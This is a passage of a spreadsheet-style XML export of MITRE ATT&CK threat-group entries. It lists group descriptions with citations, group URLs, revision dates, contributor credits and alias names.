In October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018)</t>
  </si>
  <si>
    <t>[Scarlet Mimic](https://attack.mitre.org/groups/G0029) is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group's motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029) and [Putter Panda](https://attack.mitre.org/groups/G0024), it has not been concluded that the groups are the same. (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. [SideCopy](https://attack.mitre.org/groups/G1008)'s name comes from its infection chain that tries to mimic that of [Sidewinder](https://attack.mitre.org/groups/G0121), a suspected Indian threat group.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.(Citation: ATT Sidewinder January 2021)(Citation: Securelist APT Trends April 2018)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank's Automated Workstation Client, ATMs, and card processing.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) </t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) is a group that has targeted research and proprietary data at universities, government agencies, and private sector companies worldwide since at least 2013. Members of  [Silent Librarian](https://attack.mitre.org/groups/G0122) are known to have been affiliated with the Iran-based Mabna Institute which has conducted cyber intrusions at the behest of the government of Iran, specifically the Islamic Revolutionary Guard Corps (IRGC).(Citation: DOJ Iran Indictments March 2018)(Citation: Phish Labs Silent Librarian)(Citation: Malwarebytes Silent Librarian October 2020)</t>
  </si>
  <si>
    <t>[SilverTerrier](https://attack.mitre.org/groups/G0083) is a Nigerian threat group that has been seen active since 2014. [SilverTerrier](https://attack.mitre.org/groups/G0083) mainly targets organizations in high technology, higher education, and manufacturing.(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. (Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. (Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>[Strider](https://attack.mitre.org/groups/G0041) is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda.(Citation: Symantec Strider Blog)(Citation: Kaspersky ProjectSauron Blog)</t>
  </si>
  <si>
    <t>[Suckfly](https://attack.mitre.org/groups/G0039) is a China-based threat group that has been active since at least 2014. (Citation: Symantec Suckfly March 2016)</t>
  </si>
  <si>
    <t>[TA459](https://attack.mitre.org/groups/G0062) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) is a cyber criminal group that has been active since at least 2014. [TA505](https://attack.mitre.org/groups/G0092) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving [Clop](https://attack.mitre.org/software/S0611).(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: NCC Group TA505)(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) is a financially-motivated threat group that has been active since at least 2018. (Citation: Secureworks GOLD CABIN) The group has primarily targeted English, German, Italian, and Japanese speakers through email-based malware distribution campaigns. (Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing [TRITON](https://attack.mitre.org/software/S0609), a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.(Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021)</t>
  </si>
  <si>
    <t>[The White Company](https://attack.mitre.org/groups/G0089) is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Threat Group-1314](https://attack.mitre.org/groups/G0028) is an unattributed threat group that has used compromised credentials to log into a victim's remote access infrastructure. (Citation: Dell TG-1314)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims.(Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Securelist LuckyMouse June 2018)(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Thrip](https://attack.mitre.org/groups/G0076) is an espionage group that has targeted satellite communications, telecoms, and defense contractor companies in the U.S. and Southeast Asia. The group uses custom malware as well as "living off the land" techniques. (Citation: Symantec Thrip June 2018)</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. [Tonto Team](https://attack.mitre.org/groups/G0131) has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).(Citation: Kaspersky CactusPete Aug 2020)(Citation: ESET Exchange Mar 2021)(Citation: FireEye Chinese Espionage October 2019)(Citation: ARS Technica China Hack SK April 2017)(Citation: Trend Micro HeartBeat Campaign January 2013)(Citation: Talos Bisonal 10 Years March 2020)</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://attack.mitre.org/groups/G0081) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) is a Russian-based threat group that has infected victims in over 45 countries, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies since 2004. Heightened activity was seen in mid-2015. [Turla](https://attack.mitre.org/groups/G0010) is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware. [Turla](https://attack.mitre.org/groups/G0010)’s espionage platform is mainly used against Windows machines, but has also been seen used against macOS and Linux machines.(Citation: Kaspersky Turla)(Citation: ESET Gazer Aug 2017)(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Volatile Cedar](https://attack.mitre.org/groups/G0123) is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. [Volatile Cedar](https://attack.mitre.org/groups/G0123) has been operating since 2012 and is motivated by political and ideological interests.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. [WIRTE](https://attack.mitre.org/groups/G0090) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.(Citation: Lab52 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[Whitefly](https://attack.mitre.org/groups/G0107) is a cyber espionage group that has been operating since at least 2017. The group has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information. The group has been linked to an attack against Singapore’s largest public health organization, SingHealth.(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t>The [Windigo](https://attack.mitre.org/groups/G0124) group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the [Ebury](https://attack.mitre.org/software/S0377) SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, [Windigo](https://attack.mitre.org/groups/G0124) operators continued updating [Ebury](https://attack.mitre.org/software/S0377) through 2019.(Citation: ESET Windigo Mar 2014)(Citation: CERN Windigo June 2019)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: 401 TRG Winnti Umbrella May 2018)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.(Citation: Microsoft Targeting Elections September 2020)(Citation: Check Point APT31 February 2021)</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as [PoisonIvy](https://attack.mitre.org/software/S0012), as well as some non-public backdoors. (Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) is a threat group that has been active since at least 2006. Individual members of [menuPass](https://attack.mitre.org/groups/G0045) are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)
[menuPass](https://attack.mitre.org/groups/G0045) has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.(Citation: Palo Alto menuPass Feb 2017)(Citation: Crowdstrike CrowdCast Oct 2013)(Citation: FireEye Poison Ivy)(Citation: PWC Cloud Hopper April 2017)(Citation: FireEye APT10 April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0099</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0023</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0025</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0026</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0073</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0016</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0022</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0013</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0050</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0064</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0067</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0082</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0087</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0096</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0130</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0138</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G1007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0143</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G1002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0060</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0135</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0063</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0098</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0108</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0114</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0080</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0142</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0052</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0070</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0079</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0105</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0012</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0017</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0035</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G1011</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G1006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0066</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G1003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0020</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0120</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0051</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0085</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0053</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0037</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0046</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0061</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0137</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0117</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0093</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0036</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0115</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0084</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0047</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0078</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0043</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0125</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G1001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0126</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0100</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0136</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0119</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0094</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G1004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0032</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0140</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0077</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0065</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0030</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0095</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0059</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0103</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0021</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G1009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0069</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0129</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0055</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0019</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0133</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0049</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0071</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0068</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G1005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0056</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0040</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0011</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0033</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0024</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0048</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0075</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0106</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0034</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0029</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G1008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0121</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0091</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0122</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0083</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0054</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0038</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0041</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0039</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0062</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0092</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0127</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0088</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0139</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0089</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0028</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0027</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0076</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0131</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0134</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0081</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0010</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0123</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0090</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0107</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0124</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0112</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0044</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0102</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0128</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0018</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0045</t>
  </si>
  <si>
    <t>23 September 2019</t>
  </si>
  <si>
    <t>26 December 2021</t>
  </si>
  <si>
    <t>15 May 2020</t>
  </si>
  <si>
    <t>01 July 2022</t>
  </si>
  <si>
    <t>21 December 2020</t>
  </si>
  <si>
    <t>18 July 2019</t>
  </si>
  <si>
    <t>22 September 2020</t>
  </si>
  <si>
    <t>03 March 2021</t>
  </si>
  <si>
    <t>24 September 2021</t>
  </si>
  <si>
    <t>24 November 2021</t>
  </si>
  <si>
    <t>27 January 2021</t>
  </si>
  <si>
    <t>24 May 2019</t>
  </si>
  <si>
    <t>03 February 2021</t>
  </si>
  <si>
    <t>05 May 2021</t>
  </si>
  <si>
    <t>02 September 2021</t>
  </si>
  <si>
    <t>24 March 2021</t>
  </si>
  <si>
    <t>13 October 2020</t>
  </si>
  <si>
    <t>16 March 2022</t>
  </si>
  <si>
    <t>02 September 2022</t>
  </si>
  <si>
    <t>17 December 2021</t>
  </si>
  <si>
    <t>29 June 2022</t>
  </si>
  <si>
    <t>22 March 2019</t>
  </si>
  <si>
    <t>12 August 2022</t>
  </si>
  <si>
    <t>15 September 2022</t>
  </si>
  <si>
    <t>06 October 2021</t>
  </si>
  <si>
    <t>26 October 2021</t>
  </si>
  <si>
    <t>27 January 2022</t>
  </si>
  <si>
    <t>4.0</t>
  </si>
  <si>
    <t>5.0</t>
  </si>
  <si>
    <t>Darren Spruell; FS-ISAC</t>
  </si>
  <si>
    <t>Drew Church, Splunk; Emily Ratliff, IBM; Richard Gold, Digital Shadows; Sébastien Ruel, CGI</t>
  </si>
  <si>
    <t>Daniyal Naeem, BT Security; Katie Nickels, Red Canary; Matt Brenton, Zurich Insurance Group</t>
  </si>
  <si>
    <t>Patrick Sungbahadoor</t>
  </si>
  <si>
    <t>Dragos  Threat  Intelligence</t>
  </si>
  <si>
    <t>Valerii Marchuk, Cybersecurity Help s.r.o.</t>
  </si>
  <si>
    <t>Kyoung-ju Kwak (S2W)</t>
  </si>
  <si>
    <t>Hiroki Nagahama, NEC Corporation; Manikantan Srinivasan, NEC Corporation India; NST Assure Research Team, NetSentries Technologies; Pooja Natarajan, NEC Corporation India</t>
  </si>
  <si>
    <t>Trend Micro Incorporated</t>
  </si>
  <si>
    <t>Harry, CODEMIZE</t>
  </si>
  <si>
    <t>Andrew Smith, @jakx_</t>
  </si>
  <si>
    <t>Dragos Threat Intelligence</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); Drew Church, Splunk</t>
  </si>
  <si>
    <t>Cybereason Nocturnus, @nocturnus; Daniyal Naeem, BT Security</t>
  </si>
  <si>
    <t>Thijn Bukkems, Amazon</t>
  </si>
  <si>
    <t>ESET; Trend Micro Incorporated</t>
  </si>
  <si>
    <t>Daniyal Naeem, BT Security; Harshal Tupsamudre, Qualys; Matt Brenton, Zurich Insurance Group; Mayuresh Dani, Qualys</t>
  </si>
  <si>
    <t>Dragos Threat Intelligence; Mindaugas Gudzis, BT Security</t>
  </si>
  <si>
    <t>Dongwook Kim, KISA; Taewoo Lee, KISA</t>
  </si>
  <si>
    <t>David Hughes, BT Security; Flavio Costa, Cisco; Matt Brenton, Zurich Insurance Group</t>
  </si>
  <si>
    <t>Dragos  Threat  Intelligence; Kyaw Pyiyt Htet, @KyawPyiytHtet</t>
  </si>
  <si>
    <t>Anastasios Pingios; Bryan Lee; Daniyal Naeem, BT Security</t>
  </si>
  <si>
    <t>Daniyal Naeem, BT Security; Ozer Sarilar, @ozersarilar, STM</t>
  </si>
  <si>
    <t>Bryan Lee; Dragos  Threat  Intelligence; Robert Falcone</t>
  </si>
  <si>
    <t>Daniyal Naeem, BT Security; Lacework Labs</t>
  </si>
  <si>
    <t>Ryo Tamura, SecureBrain Corporation; Shotaro Hamamoto, NEC Solution Innovators, Ltd; Shuhei Sasada, Cyber Defense Institute, Inc; Takuma Matsumoto, LAC Co., Ltd; Yusuke Niwa, ITOCHU Corporation</t>
  </si>
  <si>
    <t>Darin Smith, Cisco; Will Thomas, Cyjax</t>
  </si>
  <si>
    <t>Daniyal Naeem, BT Security; Kyaw Pyiyt Htet, @KyawPyiytHtet</t>
  </si>
  <si>
    <t>Bart Parys; Edward Millington</t>
  </si>
  <si>
    <t>Edward Millington; Matthieu Faou, ESET</t>
  </si>
  <si>
    <t>Lab52 by S2 Grupo</t>
  </si>
  <si>
    <t>Edward Millington; Oleksiy Gayda</t>
  </si>
  <si>
    <t>Edward Millington; Michael Cox</t>
  </si>
  <si>
    <t>Blind Eagle</t>
  </si>
  <si>
    <t>Comment Crew, Comment Group, Comment Panda</t>
  </si>
  <si>
    <t>DNSCALC, DynCalc, IXESHE, Numbered Panda</t>
  </si>
  <si>
    <t>Deputy Dog</t>
  </si>
  <si>
    <t>Dynamite Panda, TG-0416, Threat Group-0416</t>
  </si>
  <si>
    <t>C0d0so0, Codoso, Codoso Team, Sunshop Group</t>
  </si>
  <si>
    <t>Fancy Bear, Group 74, IRON TWILIGHT, Pawn Storm, SNAKEMACKEREL, STRONTIUM, Sednit, Sofacy, Swallowtail, TG-4127, Threat Group-4127, Tsar Team</t>
  </si>
  <si>
    <t>Cozy Bear, CozyDuke, Dark Halo, IRON HEMLOCK, IRON RITUAL, NOBELIUM, NobleBaron, StellarParticle, The Dukes, UNC2452, YTTRIUM</t>
  </si>
  <si>
    <t>Buckeye, Gothic Panda, Pirpi, TG-0110, Threat Group-0110, UPS Team</t>
  </si>
  <si>
    <t>APT-C-00, OceanLotus, SeaLotus</t>
  </si>
  <si>
    <t>Elfin, HOLMIUM</t>
  </si>
  <si>
    <t>Group123, InkySquid, Reaper, Richochet Chollima, ScarCruft, TEMP.Reaper</t>
  </si>
  <si>
    <t>BeagleBoyz, Bluenoroff, NICKEL GLADSTONE, Stardust Chollima</t>
  </si>
  <si>
    <t>Chafer, ITG07, Remix Kitten</t>
  </si>
  <si>
    <t>Wicked Panda</t>
  </si>
  <si>
    <t>AjaxTM, Flying Kitten, Operation Saffron Rose, Operation Woolen-Goldfish, Rocket Kitten</t>
  </si>
  <si>
    <t>Silent Chollima</t>
  </si>
  <si>
    <t>Group 72</t>
  </si>
  <si>
    <t>T-APT-17</t>
  </si>
  <si>
    <t>REDBALDKNIGHT, Tick</t>
  </si>
  <si>
    <t>Palmerworm</t>
  </si>
  <si>
    <t>TG-2889, Threat Group 2889</t>
  </si>
  <si>
    <t>Cobalt Gang, Cobalt Spider, GOLD KINGSWOOD</t>
  </si>
  <si>
    <t>Confucius APT</t>
  </si>
  <si>
    <t>DUBNIUM</t>
  </si>
  <si>
    <t>Black Vine, KungFu Kittens, PinkPanther, Shell Crew, WebMasters</t>
  </si>
  <si>
    <t>Berserk Bear, Crouching Yeti, DYMALLOY, Energetic Bear, IRON LIBERTY, TEMP.Isotope, TG-4192</t>
  </si>
  <si>
